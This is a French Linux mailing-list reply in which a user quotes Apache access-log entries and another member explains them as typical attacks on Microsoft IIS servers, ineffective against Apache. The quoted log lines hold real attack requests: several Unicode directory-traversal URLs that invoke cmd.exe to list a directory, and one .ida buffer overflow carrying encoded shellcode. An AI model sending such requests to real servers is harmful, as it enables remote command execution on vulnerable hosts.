Re: [debutant] Log Httpd

[babyblood]

Troumad wrote:

Je profite de ce fil sur les logs pour regarder les miens.
J'en suis � /var/log/httpd/access_log
Je vois plein d'engin du style :
213.119.26.92 - - [21/Sep/2003:21:10:38 +0200] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 593 
"-" "-"
213.119.26.92 - - [21/Sep/2003:21:10:38 +0200] "GET 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427 
"-" "-"
213.119.26.92 - - [21/Sep/2003:21:10:38 +0200] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 593 
"-" "-"
213.119.26.92 - - [21/Sep/2003:21:10:39 +0200] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 593 
"-" "-"
213.119.26.92 - - [21/Sep/2003:21:10:39 +0200] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 418 
"-" "-"
213.119.26.92 - - [21/Sep/2003:21:10:40 +0200] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 418 "-" 
"-"
213.119.26.92 - - [21/Sep/2003:21:10:40 +0200] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 593 
"-" "-"
213.119.26.92 - - [21/Sep/2003:21:10:40 +0200] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 593 "-" 
"-"
68.38.238.151 - - [22/Sep/2003:07:12:35 +0200] "GET 
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  
HTTP/1.0" 401 593 "-" "-"

Est-ce des attaques de virus contre des syst�mes windows?
Ceci donne bien envie de modifier la place du serveur dans 
l'arborescence des ordinateurs!


Ce sont des attaques types utilis�es contre les serveurs IIS de Krosoft 
(faille Unicode permettant d'avoir un "shell" distant et par exemple 
lister ton C:\).
Bien s�r c'est totelement inefficasse contre ton Apache ;-)

A bient�t


Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft?
Rendez-vous sur "http://www.mandrakestore.com";.
Foire Aux Questions de la liste : http://mdk.mondelinux.org